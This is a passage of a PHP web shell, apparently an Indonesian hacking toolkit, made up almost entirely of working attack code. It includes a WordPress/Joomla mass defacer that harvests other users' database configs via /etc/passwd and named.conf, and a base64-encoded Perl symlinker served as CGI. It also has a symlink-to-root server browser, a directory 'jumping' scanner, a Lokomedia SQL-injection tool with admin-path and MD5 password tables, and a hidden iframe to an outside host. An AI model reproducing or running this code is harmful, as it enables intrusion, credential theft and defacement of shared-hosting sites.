45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
1261 NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
1262 h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
1263 G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
1264 YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
1265 kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
1266 B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
1267 kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
1268 VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
1269 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
1270 cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
1271 MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
1272 R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
1273</body></html>';
1274 }
1275} elseif($_GET['do'] == 'symser'){
1276$d0mains = @file("/etc/named.conf");
1277if($d0mains){@mkdir("/priv_sym",0777);@chdir("/priv_sym");@exe("ln -s / root");$file3 = 'Options all
1278DirectoryIndex Priv.html
1279AddType text/plain .php
1280AddHandler server-parsed .php
1281AddType text/plain .html
1282AddHandler txt .html
1283Require None
1284Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("priv",0777);@chdir("priv");exe("ln -s / root");$file3 = 'Options all
1285 DirectoryIndex Priv.html
1286 AddType text/plain .php
1287 AddHandler server-parsed .php
1288 AddType text/plain .html
1289 AddHandler txt .html
1290 Require None
1291 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/priv/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("priv",0777);@chdir("priv");@exe("ln -s / root");$file3 = 'Options all
1292 DirectoryIndex Priv.html
1293 AddType text/plain .php
1294 AddHandler server-parsed .php
1295 AddType text/plain .html
1296 AddHandler txt .html
1297 Require None
1298 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><h2 class='cgx2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/priv/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}
1299
1300 }elseif($_GET['do'] == 'jumping') {
1301 $i = 0;
1302 echo "<div class='margin: 5px auto;'>";
1303 if(preg_match("/hsphere/", $dir)) {
1304 $urls = explode("\r\n", $_POST['url']);
1305 if(isset($_POST['jump'])) {
1306 echo "<pre>";
1307 foreach($urls as $url) {
1308 $url = str_replace(array("http://","www."), "", strtolower($url));
1309 $etc = "/etc/passwd";
1310 $f = fopen($etc,"r");
1311 while($gets = fgets($f)) {
1312 $pecah = explode(":", $gets);
1313 $user = $pecah[0];
1314 $dir_user = "/hsphere/local/home/$user";
1315 if(is_dir($dir_user) === true) {
1316 $url_user = $dir_user."/".$url;
1317 if(is_readable($url_user)) {
1318 $i++;
1319 $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$url_user'><font color=gold>$url_user</font></a>";
1320 if(is_writable($url_user)) {
1321 $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$url_user'><font color=gold>$url_user</font></a>";
1322 }
1323 echo $jrw."<br>";
1324 }
1325 }
1326 }
1327 }
1328 if($i == 0) {
1329 } else {
1330 echo "<br>Total ada ".$i." Kimcil di ".$ip;
1331 }
1332 echo "</pre>";
1333 } else {
1334 echo '<center>
1335 <form method="post">
1336 List Domains: <br>
1337 <textarea name="url" style="width: 500px; height: 250px;">';
1338 $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1339 while($getss = fgets($fp)) {
1340 echo $getss;
1341 }
1342 echo '</textarea><br>
1343 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1344 </form></center>';
1345 }
1346 } elseif(preg_match("/vhosts/", $dir)) {
1347 $urls = explode("\r\n", $_POST['url']);
1348 if(isset($_POST['jump'])) {
1349 echo "<pre>";
1350 foreach($urls as $url) {
1351 $web_vh = "/var/www/vhosts/$url/httpdocs";
1352 if(is_dir($web_vh) === true) {
1353 if(is_readable($web_vh)) {
1354 $i++;
1355 $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$web_vh'><font color=gold>$web_vh</font></a>";
1356 if(is_writable($web_vh)) {
1357 $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$web_vh'><font color=gold>$web_vh</font></a>";
1358 }
1359 echo $jrw."<br>";
1360 }
1361 }
1362 }
1363 if($i == 0) {
1364 } else {
1365 echo "<br>Total ada ".$i." Kimcil di ".$ip;
1366 }
1367 echo "</pre>";
1368 } else {
1369 echo '<center>
1370 <form method="post">
1371 List Domains: <br>
1372 <textarea name="url" style="width: 500px; height: 250px;">';
1373 bing("ip:$ip");
1374 echo '</textarea><br>
1375 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1376 </form></center>';
1377 }
1378 } else {
1379 echo "<pre>";
1380 $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1381 while($passwd = fgets($etc)) {
1382 if($passwd == '' || !$etc) {
1383 echo "<font color=red>Can't read /etc/passwd</font>";
1384 } else {
1385 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1386 foreach($user_jumping[1] as $user_ec_jump) {
1387 $user_jumping_dir = "/home/$user_ec_jump/public_html";
1388 if(is_readable($user_jumping_dir)) {
1389 $i++;
1390 $jrw = "[<font color=lime>R</font>] <a href='?bom&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1391 if(is_writable($user_jumping_dir)) {
1392 $jrw = "[<font color=lime>RW</font>] <a href='?bom&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1393 }
1394 echo $jrw;
1395 if(function_exists('posix_getpwuid')) {
1396 $domain_jump = file_get_contents("/etc/named.conf");
1397 if($domain_jump == '') {
1398 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1399 } else {
1400 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1401 foreach($domains_jump[1] as $dj) {
1402 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1403 $user_jumping_url = $user_jumping_url['name'];
1404 if($user_jumping_url == $user_ec_jump) {
1405 echo " => ( <u>$dj</u> )<br>";
1406 break;
1407 }
1408 }
1409 }
1410 } else {
1411 echo "<br>";
1412 }
1413 }
1414 }
1415 }
1416 }
1417 if($i == 0) {
1418 } else {
1419 echo "<br>Total ada ".$i." Kimcil di ".$ip;
1420 }
1421 echo "</pre>";
1422 }
1423 echo "</div>";
1424}elseif($_GET['do'] == 'lokmed_login_shell'){
1425echo'
1426<html>
1427<head>
1428<style type="text/css">
1429textarea {
1430 width: 500px;
1431 height: 200px;
1432 border: 1px solid #7FFFFF;
1433 margin: 5px auto;
1434 padding: 7px;
1435}
1436input[type=submit] {
1437 width: 500px;
1438 height: 25px;
1439 border: 1px solid #7FFFFF;
1440 background: transparent;
1441 margin: 5px auto;
1442 background: #7FFFFF;
1443 color: black;
1444 cursor: pointer;
1445}
1446</style>
1447</head>
1448<center>
1449<h1> Lokomedia SQL-Injection + Scan Admin Login</h1>
1450<form method="post">
1451<textarea name="target" placeholder="http://www.target.com/" style="width: 500px; height: 250px;" required></textarea><br>
1452<input type="submit" name="go" value="Xploit" style="width: 500px;">
1453</form>
1454</center>';
1455function ngcurl($url) {
1456 $curl = curl_init($url);
1457 curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
1458 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
1459 $content = curl_exec($curl);
1460 curl_close($curl);
1461 return $content;
1462}
1463$admin = array(
1464'adm/',
1465'_adm_/',
1466'_admin_/',
1467'_administrator_/',
1468'operator/',
1469'sika/',
1470'develop/',
1471'ketua/',
1472'redaktur/',
1473'author',
1474'admin/',
1475'administrator/',
1476'adminweb/',
1477'user/',
1478'users/',
1479'dinkesadmin/',
1480'retel/',
1481'author/',
1482'panel/',
1483'paneladmin/',
1484'panellogin/',
1485'redaksi/',
1486'cp-admin/',
1487'master/',
1488'master/index.php',
1489'master/login.php',
1490'operator/index.php',
1491'sika/index.php',
1492'develop/index.php',
1493'ketua/index.php',
1494'redaktur/index.php',
1495'admin/index.php',
1496'administrator/index.php',
1497'adminweb/index.php',
1498'user/index.php',
1499'users/index.php',
1500'dinkesadmin/index.php',
1501'retel/index.php',
1502'author/index.php',
1503'panel/index.php',
1504'paneladmin/index.php',
1505'panellogin/index.php',
1506'redaksi/index.php',
1507'cp-admin/index.php',
1508'operator/login.php',
1509'sika/login.php',
1510'develop/login.php',
1511'ketua/login.php',
1512'redaktur/login.php',
1513'admin/login.php',
1514'administrator/login.php',
1515'adminweb/login.php',
1516'user/login.php',
1517'users/login.php',
1518'dinkesadmin/login.php',
1519'retel/login.php',
1520'author/login.php',
1521'panel/login.php',
1522'paneladmin/login.php',
1523'panellogin/login.php',
1524'redaksi/login.php',
1525'cp-admin/login.php',
1526'terasadmin/',
1527'terasadmin/index.php',
1528'terasadmin/login.php',
1529'rahasia/',
1530'rahasia/index.php',
1531'rahasia/admin.php',
1532'rahasia/login.php',
1533'dinkesadmin/',
1534'dinkesadmin/login.php',
1535'adminpmb/',
1536'adminpmb/index.php',
1537'adminpmb/login.php',
1538'system/',
1539'system/index.php',
1540'system/login.php',
1541'webadmin/',
1542'webadmin/index.php',
1543'webadmin/login.php',
1544'wpanel/',
1545'wpanel/index.php',
1546'wpanel/login.php',
1547'adminpanel/index.php',
1548'adminpanel/',
1549'adminpanel/login.php',
1550'adminkec/',
1551'adminkec/index.php',
1552'adminkec/login.php',
1553'admindesa/',
1554'admindesa/index.php',
1555'admindesa/login.php',
1556'adminkota/',
1557'adminkota/index.php',
1558'adminkota/login.php',
1559'admin123/',
1560'admin123/index.php',
1561'admin123/login.php',
1562'logout/',
1563'logout/index.php',
1564'logout/login.php',
1565'logout/admin.php',
1566'adminweb_setting',
1567);
1568$real_pass = array(
1569"a66abb5684c45962d887564f08346e8d" => "admin123456",
1570"99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
1571"c630643500720b255abb22e2ab2c31f6" => "sumedang123",
1572"1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
1573"f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
1574"93261ae77f0df5522dd9767203f3aa17" => "house69",
1575"f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
1576"37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
1577"d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
1578"fbff29af096fa646757ce8439b644714" => "vro190588",
1579"1feadc10e93f2b64c65868132f1e72d3" => "agoes",
1580"0192023a7bbd73250516f069df18b500" => "admin123",
1581"7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
1582"24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
1583"d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
1584"5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
1585"a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
1586"73acd9a5972130b75066c82595a1fae3" => "ADMIN",
1587"511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
1588"7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
1589"99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
1590"e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
1591"5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
1592"c21f969b5f03d33d43e04f8f136e7682" => "default",
1593"1a1dc91c907325c69271ddf0c944bc72" => "pass",
1594"fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
1595"5f4dcc3b5aa765d61d8327deb882cf99" => "password",
1596"5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
1597"c893bad68927b457dbed39460e6afd62" => "prueba",
1598"b2ca9cfa6067282a031d28a54886822d" => "admin4343",
1599"3a3795bb61d5377545b4f345ff223e3d" => "bingo",
1600"e172dd95f4feb21412a692e73929961e" => "bismillah",
1601"8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
1602"0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
1603"098f6bcd4621d373cade4e832627b4f6" => "test",
1604"976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
1605"5985609a2dc01098797c94a43e0a1115" => "masarief",
1606"21232f297a57a5a743894a0e4a801fc3" => "admin",
1607"1870a829d9bc69abf500eca6f00241fe" => "wordpress",
1608"126ac9f6149081eb0e97c2e939eaad52" => "blog",
1609"fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
1610"04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
1611"91f5167c34c400758115c2a6826ec2e3" => "administrador",
1612"200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
1613"c93ccd78b2076528346216b3b2f701e6" => "admin1234",
1614"912ec803b2ce49e4a541068d495ab570" => "asdf",
1615"1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
